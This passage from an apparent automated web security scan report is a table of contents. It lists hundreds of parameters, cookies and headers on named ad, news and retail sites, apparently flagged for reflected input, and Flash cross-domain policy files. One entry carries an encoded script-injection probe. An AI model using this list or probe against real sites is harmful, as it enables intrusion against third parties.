5.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 2]

5.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 3]

5.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [TargetID parameter]

5.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [UIT parameter]

5.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [name of an arbitrarily supplied request parameter]

5.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [&PID parameter]

5.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]

5.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [AN parameter]

5.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [ASID parameter]

5.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [PG parameter]

5.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 2]

5.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 3]

5.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [TargetID parameter]

5.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [UIT parameter]

5.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [name of an arbitrarily supplied request parameter]

5.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [&PID parameter]

5.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter]

5.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [AN parameter]

5.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [ASID parameter]

5.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [PG parameter]

5.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [TargetID parameter]

5.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [UIT parameter]

5.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [name of an arbitrarily supplied request parameter]

5.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [&PID parameter]

5.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [AN parameter]

5.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [ASID parameter]

5.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [PG parameter]

5.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 2]

5.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 3]

5.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [TargetID parameter]

5.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [UIT parameter]

5.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [click parameter]

5.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [name of an arbitrarily supplied request parameter]

5.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [&PID parameter]

5.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [AN parameter]

5.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [ASID parameter]

5.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [PG parameter]

5.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 2]

5.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 3]

5.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [TargetID parameter]

5.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [UIT parameter]

5.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [click parameter]

5.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [name of an arbitrarily supplied request parameter]

5.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [&PID parameter]

5.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [AN parameter]

5.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [ASID parameter]

5.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [PG parameter]

5.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 2]

5.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 3]

5.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [TargetID parameter]

5.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [UIT parameter]

5.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [click parameter]

5.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [name of an arbitrarily supplied request parameter]

5.155. http://alex-johnson.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.156. http://api.bing.com/qsonhs.aspx [&q parameter]

5.157. http://api.bing.com/qsonhs.aspx [q parameter]

5.158. http://ar.voicefive.com/b/rc.pli [func parameter]

5.159. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

5.160. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

5.161. http://athima-chansanchai.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.162. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.163. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.164. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.165. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.166. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.167. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.168. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.169. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.170. http://bodyodd.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.171. http://boyle.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.172. http://cartoonblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.173. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

5.174. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

5.175. http://cosmiclog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.176. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

5.177. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

5.178. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [c parameter]

5.179. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]

5.180. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]

5.181. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]

5.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

5.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

5.184. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [l parameter]

5.185. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

5.186. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

5.187. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

5.188. http://digg.com/search [REST URL parameter 1]

5.189. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 2]

5.190. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 3]

5.191. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 4]

5.192. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 [keywords parameter]

5.193. http://helenaspopkin.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.194. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.195. http://ingame.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.196. http://investing.money.redacted/investments/charts [Symbol parameter]

5.197. http://js.revsci.net/gateway/gw.js [csid parameter]

5.198. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

5.199. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

5.200. http://michaelwann.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.201. http://redacted/investor/charts/chartdl.aspx [symbol parameter]

5.202. http://redacted/investor/charts/chartdl.aspx [symbol parameter]

5.203. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]

5.204. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 [name of an arbitrarily supplied request parameter]

5.205. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 [name of an arbitrarily supplied request parameter]

5.206. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 [name of an arbitrarily supplied request parameter]

5.207. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 [name of an arbitrarily supplied request parameter]

5.208. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 [name of an arbitrarily supplied request parameter]

5.209. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 [name of an arbitrarily supplied request parameter]

5.210. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [GT1 parameter]

5.211. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [name of an arbitrarily supplied request parameter]

5.212. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 [name of an arbitrarily supplied request parameter]

5.213. http://openchannel.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.214. http://openchannel.msnbc.redacted/_vine/printer [path parameter]

5.215. http://photoblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.216. http://photoblog.msnbc.redacted/_vine/printer [path parameter]

5.217. http://polls.newsvine.com/favicon.ico [REST URL parameter 1]

5.218. http://recruiting.scout.com/a.z [c parameter]

5.219. http://recruiting.scout.com/a.z [c parameter]

5.220. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]

5.221. http://redtape.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.222. http://s18.sitemeter.com/js/counter.asp [site parameter]

5.223. http://s18.sitemeter.com/js/counter.js [site parameter]

5.224. http://suzanne-choney.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.225. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.226. http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch [name of an arbitrarily supplied request parameter]

5.227. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [name of an arbitrarily supplied request parameter]

5.228. http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook [name of an arbitrarily supplied request parameter]

5.229. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 3]

5.230. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 4]

5.231. http://technolog.msnbc.redacted/_vine/printer [path parameter]

5.232. http://technolog.msnbc.redacted/amazon [name of an arbitrarily supplied request parameter]

5.233. http://technolog.msnbc.redacted/app-store [name of an arbitrarily supplied request parameter]

5.234. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]

5.235. http://technolog.msnbc.redacted/ces-2011 [name of an arbitrarily supplied request parameter]

5.236. http://technolog.msnbc.redacted/citizen-gamer [name of an arbitrarily supplied request parameter]

5.237. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]

5.238. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]

5.239. http://technolog.msnbc.redacted/google [name of an arbitrarily supplied request parameter]

5.240. http://technolog.msnbc.redacted/internet [name of an arbitrarily supplied request parameter]

5.241. http://technolog.msnbc.redacted/ipad [name of an arbitrarily supplied request parameter]

5.242. http://technolog.msnbc.redacted/iphone [name of an arbitrarily supplied request parameter]

5.243. http://technolog.msnbc.redacted/itunes [name of an arbitrarily supplied request parameter]

5.244. http://technolog.msnbc.redacted/microsoft [name of an arbitrarily supplied request parameter]

5.245. http://technolog.msnbc.redacted/motion-controls [name of an arbitrarily supplied request parameter]

5.246. http://technolog.msnbc.redacted/online-privacy [name of an arbitrarily supplied request parameter]

5.247. http://technolog.msnbc.redacted/science [name of an arbitrarily supplied request parameter]

5.248. http://technolog.msnbc.redacted/social-media [name of an arbitrarily supplied request parameter]

5.249. http://technolog.msnbc.redacted/twitter [name of an arbitrarily supplied request parameter]

5.250. http://technolog.msnbc.redacted/verizon-wireless [name of an arbitrarily supplied request parameter]

5.251. http://technolog.msnbc.redacted/viral [name of an arbitrarily supplied request parameter]

5.252. http://technolog.msnbc.redacted/windows-phone-7 [name of an arbitrarily supplied request parameter]

5.253. http://technolog2.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.254. http://thelastword.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.255. http://thelastword.msnbc.redacted/_vine/printer [path parameter]

5.256. http://toddkenreck.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.257. http://redcated/APM/iview/139941180/direct [;wi.728;hi.90/01?click parameter]

5.258. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]

5.259. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

5.260. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

5.261. http://redcated/APM/iview/148848786/direct [REST URL parameter 4]

5.262. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]

5.263. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]

5.264. http://redcated/BEL/iview/262582811/direct [name of an arbitrarily supplied request parameter]

5.265. http://redcated/CNT/iview/286609711/direct [REST URL parameter 4]

5.266. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

5.267. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

5.268. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

5.269. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]

5.270. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]

5.271. http://redcated/CNT/iview/287065754/direct [REST URL parameter 4]

5.272. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

5.273. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

5.274. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

5.275. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]

5.276. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]

5.277. http://redcated/CNT/iview/299297287/direct [name of an arbitrarily supplied request parameter]

5.278. http://redcated/DEN/jview/286026710/direct [REST URL parameter 4]

5.279. http://redcated/DEN/jview/286026710/direct [click parameter]

5.280. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]

5.281. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]

5.282. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]

5.283. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]

5.284. http://redcated/NYC/iview/264935949/direct [REST URL parameter 4]

5.285. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

5.286. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

5.287. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

5.288. http://redcated/PTR/jview/240321567/direct [wi.1;hi.1/01?relocate parameter]

5.289. http://redcated/ULA/iview/296652509/direct [/01?click parameter]

5.290. http://redcated/ULA/iview/296652509/direct [/01?click parameter]

5.291. http://redcated/ULA/iview/296652509/direct [REST URL parameter 4]

5.292. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

5.293. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

5.294. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

5.295. http://wbenedetti.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.296. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]

5.297. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

5.298. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

5.299. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

5.300. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

5.301. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

5.302. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

5.303. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

5.304. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

5.305. http://www.co2stats.com/propres.php [name of an arbitrarily supplied request parameter]

5.306. http://www.co2stats.com/propres.php [s parameter]

5.307. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [REST URL parameter 4]

5.308. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [name of an arbitrarily supplied request parameter]

5.309. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 1]

5.310. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 2]

5.311. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 3]

5.312. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 4]

5.313. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 1]

5.314. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 2]

5.315. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 3]

5.316. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 4]

5.317. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 5]

5.318. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 1]

5.319. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 2]

5.320. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 3]

5.321. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 4]

5.322. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

5.323. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

5.324. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

5.325. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

5.326. http://www.foxsportsarizona.com/favicon.ico [REST URL parameter 1]

5.327. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [REST URL parameter 6]

5.328. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [blockID parameter]

5.329. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [feedID parameter]

5.330. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml [name of an arbitrarily supplied request parameter]

5.331. http://www.linkedin.com/cws/share-count [url parameter]

5.332. http://www.neudesicmediagroup.com/Advertising.aspx [site parameter]

5.333. https://www.newsvine.com/_nv/accounts/login [name of an arbitrarily supplied request parameter]

5.334. http://www.polls.newsvine.com/_vine/printer [path parameter]

5.335. http://www.reimage.com/includes/router_land.php [banner parameter]

5.336. http://www.reimage.com/includes/router_land.php [name of an arbitrarily supplied request parameter]

5.337. http://www.reimage.com/includes/router_land.php [tracking parameter]

5.338. http://www.scientificamerican.com/blog/observations/ [name of an arbitrarily supplied request parameter]

5.339. http://www.scout.com/a.z [blipid parameter]

5.340. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.341. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.342. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.343. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.344. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

5.345. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

5.346. http://msn.whitepages.com/ [Referer HTTP header]

5.347. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

5.348. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

5.349. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.350. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

5.351. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

5.352. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

5.353. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

5.354. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [ZEDOIDA cookie]

5.355. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

5.356. http://redacted/home.asp [name of an arbitrarily supplied request parameter]

5.357. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

5.358. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

5.359. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js [ruid cookie]

5.360. http://s18.sitemeter.com/js/counter.asp [IP cookie]

5.361. http://s18.sitemeter.com/js/counter.js [IP cookie]

5.362. http://redcated/PTR/jview/240321567/direct [AA002 cookie]

6. Flash cross-domain policy

6.1. http://ad.ae.doubleclick.net/crossdomain.xml

6.2. http://ajax.googleapis.com/crossdomain.xml

6.3. http://ak.c.ooyala.com/crossdomain.xml

6.4. http://amch.questionmarket.com/crossdomain.xml

6.5. http://ar.voicefive.com/crossdomain.xml

6.6. http://atl.whitepages.com/crossdomain.xml

6.7. http://b.rad.redacted/crossdomain.xml

6.8. http://b.voicefive.com/crossdomain.xml

6.9. http://b3.mookie1.com/crossdomain.xml

6.10. http://beta-ads.ace.advertising.com/crossdomain.xml

6.11. http://blstj.redacted/crossdomain.xml

6.12. http://college.scout.com/crossdomain.xml

6.13. http://collegebasketball.scout.com/crossdomain.xml

6.14. http://collegefootball.scout.com/crossdomain.xml

6.15. http://colstc.redacted/crossdomain.xml

6.16. http://colstj.redacted/crossdomain.xml

6.17. http://ec.redcated/crossdomain.xml

6.18. http://edge1.catalog.video.redacted/crossdomain.xml

6.19. http://edge2.catalog.video.redacted/crossdomain.xml

6.20. http://edge3.catalog.video.redacted/crossdomain.xml

6.21. http://edge4.catalog.video.redacted/crossdomain.xml

6.22. http://edge5.catalog.video.redacted/crossdomain.xml

6.23. http://i4.ytimg.com/crossdomain.xml

6.24. http://jcfootball.scout.com/crossdomain.xml

6.25. http://mlb.scout.com/crossdomain.xml

6.26. http://p.ace.advertising.com/crossdomain.xml

6.27. http://preps.scout.com/crossdomain.xml

6.28. http://profootball.scout.com/crossdomain.xml

6.29. http://r1.ace.advertising.com/crossdomain.xml

6.30. http://s0.2mdn.net/crossdomain.xml

6.31. http://sas.ooyala.com/crossdomain.xml

6.32. https://secure.scout.com/crossdomain.xml

6.33. http://stj.redacted/crossdomain.xml

6.34. http://whitepg-images.adbureau.net/crossdomain.xml

6.35. http://wrapper.g.redacted/crossdomain.xml

6.36. http://www.morningstar.com/crossdomain.xml

6.37. http://www.scout.com/crossdomain.xml

6.38. http://www.terra.com/crossdomain.xml

6.39. http://www.webmd.com/crossdomain.xml

6.40. http://ad.wsod.com/crossdomain.xml

6.41. http://admedia.wsod.com/crossdomain.xml

6.42. http://alex-johnson.newsvine.com/crossdomain.xml

6.43. http://athima-chansanchai.newsvine.com/crossdomain.xml

6.44. http://bodyodd.msnbc.redacted/crossdomain.xml

6.45. http://boyle.newsvine.com/crossdomain.xml

6.46. http://cartoonblog.msnbc.redacted/crossdomain.xml

6.47. http://cdn.modules.ooyala.com/crossdomain.xml

6.48. http://dateline.msnbc.com/crossdomain.xml

6.49. http://hardball.msnbc.com/crossdomain.xml

6.50. http://helenaspopkin.newsvine.com/crossdomain.xml

6.51. http://info.ooyala.com/crossdomain.xml

6.52. http://ingame.msnbc.redacted/crossdomain.xml

6.53. http://ingame.newsvine.com/crossdomain.xml

6.54. http://jp.video.redacted/crossdomain.xml

6.55. http://l.player.ooyala.com/crossdomain.xml

6.56. http://latino.aol.com/crossdomain.xml

6.57. http://latino.video.redacted/crossdomain.xml

6.58. http://live.newsvine.com/crossdomain.xml

6.59. http://michaelwann.newsvine.com/crossdomain.xml

6.60. http://money.aol.com/crossdomain.xml

6.61. http://msnbc.com/crossdomain.xml

6.62. http://msnbcmedia.redacted/crossdomain.xml

6.63. http://mtp.msnbc.com/crossdomain.xml

6.64. http://music.aol.com/crossdomain.xml

6.65. http://nbcsports.msnbc.com/crossdomain.xml

6.66. http://netscape.aol.com/crossdomain.xml

6.67. http://news.discovery.com/crossdomain.xml

6.68. http://nightly.msnbc.com/crossdomain.xml

6.69. http://ninemsn.video.redacted/crossdomain.xml

6.70. http://openchannel.msnbc.redacted/crossdomain.xml

6.71. http://pagead2.googlesyndication.com/crossdomain.xml

6.72. http://photobucket.com/crossdomain.xml

6.73. http://player.ooyala.com/crossdomain.xml

6.74. http://rachel.msnbc.com/crossdomain.xml

6.75. http://redtape.newsvine.com/crossdomain.xml

